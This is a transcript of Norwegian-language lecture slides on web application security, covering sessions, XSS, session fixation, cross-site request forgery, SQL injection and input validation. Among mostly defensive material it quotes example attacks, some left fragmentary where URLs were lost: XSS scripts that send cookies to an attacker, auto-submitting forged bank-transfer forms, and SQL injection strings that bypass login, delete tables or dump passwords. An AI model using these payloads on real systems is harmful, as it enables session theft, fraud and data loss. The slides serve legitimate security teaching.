1. Koble opp mot tjener 2. Send forespørsel. 3. Send respons 4. Lukk forbindelsen. Klient Tjener

Transkript

1 Web sikkerhet

2 Klient/tjener 1. Koble opp mot tjener 2. Send forespørsel 3. Send respons 4. Lukk forbindelsen Klient Tjener

3 HTTP GET GET HTTP/1.1 Host: kark.hin.no User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-no; rv: ) Gecko/ Firefox/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai n;q=0.8,image/png,*/*;q=0.5 Accept-Language: nb,no;q=0.8,nn;q=0.6,en-us;q=0.4,en;q=0.2 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer:

4 HTTP response HTTP/ OK Date: Mon, 10 Mar :45:47 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Mon, 10 Mar :45:24 GMT ETag: "fb0641-ad-398c9100" Accept-Ranges: bytes Content-length: 173 Connection: close Content-Type: text/html; charset=iso <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>test</title> </head> <body> <h1>dette er et test dokument</h1> </body> </html>

5 HTTP POST POST HTTP/1.1 Host: kark.hin.no User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-no; rv: ) Gecko/ Firefox/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,ima ge/png,*/*;q=0.5 Accept-Language: nb,no;q=0.8,nn;q=0.6,en-us;q=0.4,en;q=0.2 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: Cookie: utmz= utmccn=(direct) utmcsr=(direct) utmcmd=(none); utma= Content-Type: multipart/form-data; boundary= Content-length: Content-Disposition: form-data; name="max_file_size" Content-Disposition: form-data; name="action" POST

6 GET / POST POST bør benyttes når aksjon medfører permanent endring på tjener GET laster ned informasjon POST sender informasjon GET kan lastes på nytt av nettleser uten konsekvenser POST benyttet ved for eksempel regningsbetaling i bank Regel: Kan ikke gjentas Nettleser må advare bruker Benytt POST når aksjonen har konsekvenser

7 GET / POST Klienten har full kontroll over hva som sendes til tjener Kan endres manuelt Editering av filer Bruk av proxy slik som Webscarab alle forespørsler kan endres Endres automatisk av et program Sett fra tjenersiden Klient side sikkerhet eksisterer ikke!

8 Referer Header Settes av de fleste nettlesere og vil inneholde siden som forespørselen stammer i fra Når bruker trykker på en hyperlenke Et bilde, applet eller objekt inkluderes i siden Kan lekke ut informasjon til 3part Lagres også i historikk for nettleser Eksempel fra logg: Ikke send med sensitiv informasjon som en del av URL Benytt POST istedenfor GET for sensitiv informasjon

9 Cookies Benyttes for å gjøre HTTP statefull Små informasjonskapsler som lagres på klient Sendes med for hver forespørsel til opprinnelses stedet i HTTP meldingshodet Server setter innhold i respons Definert i RFC 2109 og RFC 2965 Eksempel: Response for setting av cookie Set-Cookie: PHPSESSID=shmcss59c6mkkrei8uvrueufc7; path=/ Eksempel: Forespørsel som returnerer cookie Cookie: PHPSESSID=shmcss59c6mkkrei8uvrueufc7

10 Sesjoner HTTP er en tilstandsløs protokoll Sesjoner benyttes bøte på dette Sesjonsdata lagres i et sesjonsobjekt slik at en tar vare på hva brukeren/klienten har utført tidligere For eksempel innlogging Et sesjons angrep innebærer å få ta i en annen brukers sesjon og dermed få tilgang til en applikasjon med en annen brukers rettigheter

11 Sesjoner PHPSESSID=shmcss59c6mkkrei8uvrueufc7 19r 11f1 dfdf Klient Tjener PHPSESSID=shmcss59c6mkkrei8uvrueufc7

12 Sesjons kapring En sesjon kjennetegnes av en sesjons id En trenger kun gjette et enkelt tall Trenger ikke brukernavn eller passord Sesjons id oppbygging må være sikker Dynamisk, endres for hver ny sesjon Benytt server generert sesjons id SesjonsID må ikke lekke ut Ikke sendes med som del av URL Benytt HTTPS Ikke lekke ut ved Cross Site Scripting (XSS)

13 Sesjons kapring Sesjons id må beskyttes! Andre tiltak: Ta vare på IP adressen for klient og lagre denne i sesjonsobjektet. Ved alle forespørsler verifiseres at IP adressen for henvendelsen er lik IP lagret i sesjonsobjektet Dersom ulik IP slett sesjonen Alternativ kan være å ta vare på nettleser i tillegg (User-Agent)

14 Sesjons kapring Generer alltid en ny sesjons ID når en bruker har logget inn Ofte opprettes en sesjon når klienten besøker et åpent webområdet Senere logger klienten inn ofte over HTTPS Sesjons id som var synlig over HTTP kan nå benyttes over HTTPS av angriper for å gi seg ut som klienten PHP løsning: session_regenerate_id() genererer ny sessionid, sesjonsinformasjon beholdes, fra og med PHP 4.3.3

15 Cross Site Scripting (XSS) 3. Skript kjører i nettleser hos klient, sender session cookie til angriper Angriper 4. Angriper benytter session cookie og opptrer som klient ovenfor webtjener 1. Angriper plassere skript på webtjener Webtjener 3. Tjener sender session cookie og angripers skript til en klient 2. Klient besøker webområdet Klient/offer

16 Cross Site Scripting (XSS) Årsak til problemet kan være Bugs i nettleser eller webtjener Feil i webapplikasjon Manglende filtrering av brukerinput Brukerinput vises til andre brukere Javascript kode vil kjøre i nettleser for annen bruker

17 Cross Site Scripting (XSS) XSS baserer seg på at en angriper lagrer/sender med et Javascript til siden som pga. manglende validering av input data vises til andre brukere Eksempel på et uskyldig skript

18 Cross Site Scripting (XSS) XSS oppstår når en hyperlenke inneholder en URL med et innebygd skript Og URL peker til en annen webtjener <h1>dette er et dårlig nettsted</h1> <a href= Hei\x20der%20)</script> >Klikk her!</a> Skript utføres som om det kommer fra det original nettstedet For nettleseren ser det ut som det kommer derfra Skript kjøres selv om nettstedet ikke skal kunne kjøre skript (for eksempel en annen sone i IE)

19 Cross Site Scripting (XSS) DOM referanser behandles som om de kom fra det originale nettstedet Mest kritisk, cookies blir tilgjengelige, angriper kan lett laste ned cookies som kun var tilgjengelig for det originale nettstedet Cookie kan inneholde nødvendig informasjon for innlogging - Remember me på nettsteder Kode for nedlasting av alle cookies fra dette nettstedet: Var = Document.cookie; document.location( + escape(var));

20 Cross Site Scripting (XSS) Eksempel skript som sender nettleser til angripers skript, cookie er parameter som sendes med: <script> document.location.replace( +?what= + document.cookie); </script> Eksempel skript som setter inn bilde med opphav i angripers skript, cookie er parameter som sendes med. Skript produserer et 1x1 piksels bilde som ikke ses av klient. <script> document.write("<img src= document.write(document.cookie); document.write(" />"); </script>

21 Hvordan unngå XSS? Input fra brukere/klienter innebærer alltid en risiko Input må ALLTID valideres Flere kjente sikkerhetsproblemer på webområder skyldes dårlig validering av brukerinput PHP funksjoner til hjelp: addslashes() ikke alltid nødvendig, dersom PHP er satt opp med magic_quotes_gpc, denne er som standard påslått og vil gjøre dette automatisk på POST og GET data mysql_real_escape_string() htmlspecialchars() strip_tags() Konvertering av strenger til tall når input er numerisk

22 Hvordan unngå XSS? Skal input data kunne inneholde HTML kode? Hvis ikke erstatt nødvendige HTML koder med tilsvarende karakter koder Skal input data kunne inneholde noen gyldige HTML koder, mens andre må filtreres? Fjern eller erstatt ugyldige HTML koder Kan være vanskelig

23 htmlspecialchars() string htmlspecialchars ( string string [, int quote_style [, string charset]] ) Konverter spesialtegn til HTML koder '&' (ampersand) blir '&' '"' (double quote) blir '"' ''' (single quote) blir '&#039;' bare når ENT_QUOTES er satt. '<' (less than) blir '<' '>' (greater than) blir '>' <?php $new = htmlspecialchars("<a href='test'>test</a>", ENT_QUOTES); echo $new; // <a href=&#039;test&#039;>test</a>?>

24 ASP.NET Server.HtmlEncode() public string HtmlEncode( string s ) Tilsvarende htmlspecialchars() i php ASP.NET har automatisk validering av input <%@ Page validaterequest= true" %> er standard, dette medfører at alle potensielt farlige tegn vil kaste en exception f.eks <SCRIPT> blokker Følgende kode ble imidlertid ikke fanget opp, må da benytte HtmlEncode() manuelt <img src="" onclick="alert(1)"/>; HtmlEncode() vil endre til: <img src="" onclick="alert(1)"/>

25 strip_tags() string strip_tags ( string str [, string allowable_tags]) Benyttes for å fjerne alle HTML pg PHP tags fra en gitt streng. Kan spesifisere hvilke tags som er tillatt som ekstra parameter Eksempel <?php Forandrer ikke atributter for tillatte tags kan være en sikkerhetsrisiko $string = strip_tags($string, '<a><b><i><u>');?>

26 ASP.NET input validering Validerings kontroller RequiredFieldValidator krever at brukeren fyller ut et felt RangeValidator sjekker verdier for et gyldig område (min maks verdi) CompareValidator sammenligner felt eller sjekk for datatype RegularExpressionValidator sammenligner et felt mot ved bruk av Regular Expressions CustomValidator egen skreddersydd validering ValidationSummary viser sammendrag av alle valideringsfeil

27 Page.IsValid Page.IsValid egenskapen for en side vil angi om en side som benytter validering er gyldig eller ikke, Må alltid sjekke denne i tjenerkoden for verdien true. Dersom denne verifikasjonen utelates vil tjenerkoden kunne motta ugyldige data i et eller flere skjemafelt.

28 RequiredFieldValidator <script runat="server"> protected void button_click(object sender, EventArgs e) { if (Page.IsValid) melding.text = "Validering OK"; else melding.text = "Validering Feilet "; } </script> <form id="form1" runat="server"> <asp:textbox id="fornavn" Text="Fornavn" runat="server"/> <asp:requiredfieldvalidator id="requiredfieldvalidator1" ControlToValidate="fornavn" Text="Skriv fornavn!" InitialValue="Fornavn" SetFocusOnError="true" runat="server"/> <asp:button id="button1" OnClick="Button2_click" runat="server" Text="Valider"/><br /> <asp:label ID="melding" runat="server"></asp:label> </form>

29 Session fixation Beskrevet av Mitja Kolŝek i 2002 Angriperen får aksess til sesjonsid før offeret For områder som benytter sesjonsid i URL Angriper besøker webområder, mottar sesjonsid Angriper lurer offer til å besøke via URL som inneholder angripers sesjonsid Angriper venter på at bruker logger inn Besøker så webområdet igjen og har full tilgang til innloggest sesjon

30 Cross-site site request forgery Session-riding (XSRF) Baserer seg på at webtjener ikke klare å skille mellom autentiske forespørsler og forespørsler basert på at brukeren er lurt Etter at brukeren er autentisert lures han til å klikke på en hyperlenke eller besøke en webside Resultatet er falske forespørsler generert For eksempel, etter at bruker er autentisert mot bank.com <a href= bank.com/transfer.php?amount=100&to= >Click</a> Eller enda enklere, krever ikke at brukeren gjør noe. Kun besøker denne websiden <img src= bank.com/transfer.php?amount=100&to= />

31 XSRF POST beskytter ikke, JavaScript kan sende POST forspørsel automatisk <form action="bank.com/transfer" method="post"/> <input type="hidden" name="to" value=" "/> <input type="hidden" name="amount" value="100000"/> <input type="submit"/> </form > <script type="text/javascript"> document.forms [0]. submit (); </script >

32 Unngå session fixation og XSRF Generer alltid en ny sesjons ID når en bruker har logget inn Dropp støtte for gammel sesjonsid Mer om dette senere...

33 SQL injection Eksempel fra et online spill for noen år siden login: john' -- password: SQL spørring SELECT * FROM users WHERE user='john' -- 'AND password=''; Resultat: Innlogging uten passord

34 SQL injection Eksempel viser hvordan metategnet medfører at SQL parseren tror at tekststrengen er slutt og vil se etter en ny SQL kommando Alle metategn må identifiseres og ufarliggjøres ved escaping Noen plattformer gjør dette automatisk, bla. PHP og ASP.NET

35 SQL injection - eksempel uten quotes Eksempel uten quotes VBscript med følgende kode: custid = Request.QueryString( id ); Query = SELECT * FROM Customer WHERE CustId= & custid; custid skal være numerisk pga ingen quotes, angriper legger inn 1; DELETE FROM Customer Spørringen endres til: SELECT * FROM Customer WHERE CustId=1; DELETE FROM Customer

36 SQL Injection Real-life example Computerworld.dk 2002, nytt system for betaling på web Noen la følgende ut i et fora I guess it would even be possible to knock the server down just by visiting (Hey, don't do it!) Noen prøvde dette selvsagt og MS SQL tjeneren kjørte SHUTDOWN, gjentok seg flere ganger

37 Fjern debug utskrift Debug informasjon beregnet for utviklere må fjernes før levering til kunde Skriv heller til fil Viser tabellinformasjon til inntrenger:

38 Directory browsing Gir mye informasjon om filstruktur og filer Her tilbys all kildekoden,.inc filer vil normalt ikke behandles av PHP før de sendes til klient

39 mysql_real_escape_string() string mysql_real_escape_string ( string unescaped_string [, resource link_identifier]) Funksjonen vil erstatte spesielle tegn i unescaped_string, men tar samtidig hensyn til gjeldende karaktersett, slik at det er sikkert å benytte den returnerte strengen i et mysql_query(). Må benyttes for binær data.

40 mysql_real_escape_string() Eksempel 1 <?php // Connect $link = mysql_connect('mysql_host', 'mysql_user', 'mysql_password') OR die(mysql_error()); // Query $query = sprintf("select * FROM users WHERE user='%s' AND password='%s'",?> mysql_real_escape_string($user), mysql_real_escape_string($password));

41 mysql_real_escape_string() Eksempel 2 <?php // Quote variable to make safe function quote_smart($value) { // Stripslashes if (get_magic_quotes_gpc()) { $value = stripslashes($value); } // Quote if not integer if (!is_numeric($value)) { $value = "'". mysql_real_escape_string($value). "'"; } return $value; } // Connect $link = mysql_connect('mysql_host', 'mysql_user', 'mysql_password') OR die(mysql_error()); // Make a safe query $query = sprintf("select * FROM users WHERE user=%s AND password=%s", quote_smart($_post['username']), quote_smart($_post['password'])); mysql_query($query);?>

42 mysql_real_escape_string() $userid = isset($_get['id'])? $_GET['id'] : 0; $userid = mysql_real_escape_string($userid); RunQuery("SELECT userid, username FROM sql_injection_test WHERE userid=$userid"); [ Tests: ] id=0 5. id=' 6. id=0 or 1 7. id=0 UNION ALL SELECT userid, CONCAT(username, ' ', password) FROM sql_injection_test WHERE 1 8. id=0 UNION ALL SELECT userid, CONCAT(username, CHAR(32), password) FROM sql_injection_test WHERE 1 Input antatt være numerisk, ikke angitt metategnet Nr 6 vil returrnere alle poster Nr 7 feiler, mens 8 utføres

43 mysql_real_escape_string() To mulige løsninger på problemet Legg på Konverter til numerisk (int) $userid = isset($_get['id'])? $_GET['id'] : 0; $userid = mysql_real_escape_string($userid); RunQuery("SELECT `userid`, `username` FROM `sql_injection_test` WHERE `userid` = '$userid'"); $userid = isset($_get['id'])? $_GET['id'] : 0; $userid = intval($userid); $userid = mysql_real_escape_string($userid); RunQuery("SELECT `userid`, `username` FROM `sql_injection_test` WHERE `userid` = '$userid'");

44 mysql_real_escape_string() $offset = isset($_get['o'])? $_GET['o'] : 0; $offset = mysql_real_escape_string($offset); RunQuery("SELECT userid, username FROM sql_injection_test LIMIT $offset, 10"); [ Tests: ] o=0 5. o=' 6. o=999999, 10 UNION ALL SELECT username, password FROM sql_injection_test LIMIT 0 Input antatt være numerisk, ikke angitt metategnet Nr 5 feiler Nr 6 viser alle poster

45 mysql_real_escape_string() Lløsning på problemet Konverter til numerisk (int) $offset = isset($_get['o'])? $_GET['o'] : 0; $offset = intval($offset); RunQuery("SELECT `userid`, `username` FROM `sql_injection_test` LIMIT $offset, 10"); // Ikke like solid... $offset = isset($_get['o'])? $_GET['o'] : 0; if (is_numeric($offset)) RunQuery("SELECT userid, username FROM sql_injection_test LIMIT $offset, 10"); is_numeric() slipper igjennom som medfører at spørringen feiler

46 SQL Injection løsning: Prepared statements Prepared statements skiller SQL og data Ingen metategn i dataene // ASP.NET SqlCommand cmd = new SqlCommand(); cmd.commandtext = "UPDATE student SET fornavn=@fornavn" + " WHERE studentid=@studentid"; // Oppdaterings parametrer cmd.parameters.addwithvalue("@fornavn", Request([ fornavn ]); cmd.parameters.addwithvalue("@studentid", Request([ studentid ]););

47 PHP mysqli_prepare() Eksempel <?php $mysqli = new mysqli('localhost', 'user', 'password', 'world'); /* check connection */ if (mysqli_connect_errno()) { printf("connect failed: %s\n", mysqli_connect_error()); exit(); } $stmt = $mysqli->prepare("insert INTO CountryLanguage VALUES (?,?,?,?)"); $stmt->bind_param('sssd', $code, $language, $official, $percent); $code = 'DEU'; $language = 'Bavarian'; $official = "F"; $percent = 11.2; /* execute prepared statement */ $stmt->execute();?>

48 Sikkerhetsbarriere mellom tjener og klient Klient Webtjener Hver gang data sendes fra tjener til klient passeres en sikkerhetsbarriere. Så snart dat har vært ute på klienten er de ikke lengre til å stole på.

49 Skjema svakheter HIDDEN felt i skjema Benyttes av ulike applikasjoner for å lagre ulik sesjonsinformasjon Alle HIDDEN felt kan endres av klient Må ikke benyttes for lagring av betydningsfull informasjon Javascript validering på klienten Klient kan enkelt gå rundt denne Ikke til å stole på

50 Skjema svakheter eksempel <form name= kjope action= URL method= POST <input type="hidden" name= delenr" value= 109 > <input type="hidden" name= pris" value= 199,95 > Antall: <input type= text" name= antall" value="1 size= 3 onchange= validate(this); > Pris kan endres på klient validate() funksjonen kan enkelt sløyfes enten ved å Slå av Javascipt i nettleser eller Ta kopi av kode Rediger denne og fjern Javascript kode Lagre filen lokalt og ta den så opp i en nettleser

51 Misforstått input vasking... Eksempel, et hjelpesystem for online betaling Kode for å hindre katalog traversering filename = Request.QueryString("file") Replace(filename, "/", "\") Replace(filename, "..\", "") Aksess til serverside kildekode

52 Beskyttelse av skjema data Data som må sendes til klient kan beskyttes av hash kode, message autentication code (MAC) Funksjon i PHP beregner MAC hvor en hemmelig nøkkel også er en parameter <?php?> function getmac($value) { $key = "g4yierf39"; return sha1($key. $value.$key); } MAC og parameter inkluderes som hidden felt i skjema <form> <input type="hidden" name= customer-id" value= > <input type="hidden" name= customer-id-mac" value= 67669a333137aded508cdd16e8ec1070e >. </form> Når data kommer inn fra klient beregnes hash på nytt av parameter (her customer-id) og sammenlignes med den innkommende MAC (customer-id id-mac) Dersom disse ikke stemmer har klienten foretatt endringer i skjemadataene

53 Beskyttelse mot XSRF Sikkerhets token genereres av webapplikasjon og legges inn i alle websider med skjema som sendes klient Ved behandling av innsendt skjema verifiseres sikkerhets token Token må ha forventet verdi, hvis ikke avbrytes forespørsel Redusert varighet på sesjon Sørg for at brukerne logger seg ut før webområdet forlates

54 Beskyttelse mot <?php session_start(); function getmac($action_name) XSRF { } $key = "sha1"; $secret = "g4yierf39"; return hash_hmac ($key, $action_name + $secret, $_GLOBAL['PHP_SESSIONID']); function verifymac($action_name) { } $key = "sha1"; $secret = "g4yierf39"; $new_mac = hash_hmac ($key, $action_name + $secret, $_GLOBAL['PHP_SESSIONID']); if($new_mac == $_POST['XSFRPreventionToken']) echo "MAC ok" ; else { echo "MAC FAILURE!!!!!!"; // Log request exit(); }

55 Beskyttelse mot if (isset($_post['submit'])) { XSRF // Verifiser token verifymac( Betaling"); // Fortsett skjemabehandling dersom token ok } else {?> <form method="post"/> <input type="hidden" name="to" value=" "/> <input type="hidden" name="amount" value="100000"/> <! Legg til XSFR token --> <? printf("<input type=\"hidden\" value=\"%s\" name=\"xsfrpreventiontoken\">", getmac( Betaling"));?> <input type="submit" name="submit"/> </form > <? }?>

56 Validering av input Identifiser og valider all input Input kan være langt mer enn hva som kan skrives på et tastatur, ta høyde for dette Opprett funksjoner for validering Opprett funksjoner som validerer input i henhold til forventet type, for eksempel funksjoner som isvalid address isvalidcustomerid Sjekk tallområde Numerisk input kan ha begrensninger på lengde, men også område For eksempel en pris kan ikke være negativ Sjekk lengden på input data Sjekk for NULL bytes Skal aldri forekomme for ikke binære data (\0) Utfør input validering før noe annet

57 CAPTCHA CAPTCHA (Completely Automated Public Turing to tell Computers from Humans Apart) er et program som kan generere tester og vurdere disse som: De fleste mennesker kan passere Dagens dataprogram ikke kan passere For eksempel: mennesker kan lese forstyrret tekst i et bilde, men et dataprogram kan ikke dette Benyttes blant annet av skattedirektoratet for å hindre søkeprogrammer aksess til skattelistene Mange implementasjoner i PHP PEAR CAPTCHA